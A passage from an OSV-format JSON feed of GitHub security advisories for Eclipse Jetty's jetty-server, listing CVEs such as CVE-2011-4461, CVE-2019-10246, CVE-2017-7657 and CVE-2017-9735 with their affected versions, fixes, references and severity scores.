"7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.47.v20220610", "9.4.48.v20220622", "9.4.49.v20220914", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.50.v20221201", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-qw69-rqj8-6qw8/GHSA-qw69-rqj8-6qw8.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.14" } ] } ], "versions": [ "10.0.0", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-qw69-rqj8-6qw8/GHSA-qw69-rqj8-6qw8.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.14" } ] } ], "versions": [ "11.0.0", "11.0.1", "11.0.10", "11.0.11", "11.0.12", "11.0.13", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-qw69-rqj8-6qw8/GHSA-qw69-rqj8-6qw8.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-qw69-rqj8-6qw8" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26048" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/issues/9076" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/pull/9344" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/pull/9345" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/releases/tag/jetty-9.4.51.v20230217" }, { "type": "WEB", "url": "https://github.com/jakartaee/servlet/blob/6.0.0/spec/src/main/asciidoc/servlet-spec-body.adoc#32-file-upload" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00039.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230526-0001" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5507" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2023-04-19T18:15:45Z", "nvd_published_at": "2023-04-18T21:15:08Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qxp4-27vx-xmm3", "published": "2022-05-14T01:27:35Z", "modified": "2024-04-19T19:16:17.732170Z", "aliases": [ "CVE-2011-4461" ], "summary": "Improper Input Validation in Jetty", "details": "Jetty 8.1.0.RC2 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "8.1.0.RC4" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.1.0.RC2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-qxp4-27vx-xmm3/GHSA-qxp4-27vx-xmm3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-4461" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/commit/085c79d7d6cfbccc02821ffdb64968593df3e0bf" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/72017" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190307-0004" }, { "type": "WEB", "url": "http://marc.info/?l=bugtraq\u0026m=143387688830075\u0026w=2" }, { "type": "WEB", "url": "http://www.kb.cert.org/vuls/id/903934" }, { "type": "WEB", "url": "http://www.ocert.org/advisories/ocert-2011-003.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-1429-1" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-07-13T18:07:02Z", "nvd_published_at": "2011-12-30T01:55:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r28m-g6j9-r2h5", "published": "2019-04-23T16:07:18Z", "modified": "2024-02-16T08:10:20.837486Z", "aliases": [ "CVE-2019-10246" ], "summary": "Information Exposure vulnerability in Eclipse Jetty", "details": "In Eclipse Jetty version 9.2.27, 9.3.26, and 9.4.16, the server running on Windows is vulnerable to exposure of the fully qualified Base Resource directory name on Windows to a remote client when it is configured for showing a Listing of directory contents. This information reveal is restricted to only the content in the configured base resource directories.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.2.0" }, { "fixed": "9.2.28.v20190418" } ] } ], "versions": [ "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.3.v20140905", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.2.27.v20190403", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-r28m-g6j9-r2h5/GHSA-r28m-g6j9-r2h5.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.3.27.v20190418" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.3.26.v20190403", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-r28m-g6j9-r2h5/GHSA-r28m-g6j9-r2h5.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.17.v20190418" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.16.v20190411", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-r28m-g6j9-r2h5/GHSA-r28m-g6j9-r2h5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10246" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=546576" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190509-0003" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-213" ], "github_reviewed": true, "github_reviewed_at": "2019-04-23T16:03:54Z", "nvd_published_at": "2019-04-22T20:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vgg8-72f2-qm23", "published": "2018-10-19T16:15:34Z", "modified": "2024-02-17T05:36:15.080820Z", "aliases": [ "CVE-2017-7657" ], "summary": "Critical severity vulnerability that affects org.eclipse.jetty:jetty-server", "details": "In Eclipse Jetty, versions 9.2.x and older, 9.3.x, transfer-encoding chunks are handled poorly. The chunk length parsing was vulnerable to an integer overflow. Thus a large chunk size could be interpreted as a smaller chunk size and content sent as chunk body could be interpreted as a pipelined request. If Jetty was deployed behind an intermediary that imposed some authorization and that intermediary allowed arbitrarily large chunks to be passed on unchanged, then this flaw could be used to bypass the authorization imposed by the intermediary as the fake pipelined request would not be interpreted by the intermediary as a request.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.2.25.v20180606" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.3.v20140905", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.2.25.v20180105", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-vgg8-72f2-qm23/GHSA-vgg8-72f2-qm23.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.3.24.v20180605" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.3.23.v20180228", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-vgg8-72f2-qm23/GHSA-vgg8-72f2-qm23.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7657" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0910" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=535668" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-vgg8-72f2-qm23" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r41af10c4adec8d34a969abeb07fd0d6ad0c86768b751464f1cdd23e8@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9159c9e7ec9eac1613da2dbaddbc15691a13d4dbb2c8be974f42e6ae@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra6f956ed4ec2855583b2d0c8b4802b450f593d37b77509b48cd5d574@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181014-0001" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbst03953en_us" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4278" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1041194" } ], "database_specific": { "cwe_ids": [ "CWE-190", "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:57:40Z", "nvd_published_at": "2018-06-26T16:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wfcc-pff6-rgc5", "published": "2018-10-19T16:15:46Z", "modified": "2024-02-16T08:22:10.602897Z", "aliases": [ "CVE-2017-9735" ], "summary": "Jetty vulnerable to exposure of sensitive information due to observable discrepancy", "details": "Jetty through 9.4.x contains a timing channel attack in `util/security/Password.java`, which allows attackers to obtain access by observing elapsed times before rejection of incorrect passwords.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.6.v20170531" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.5.v20170502", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-wfcc-pff6-rgc5/GHSA-wfcc-pff6-rgc5.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.3.20.v20170531" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", 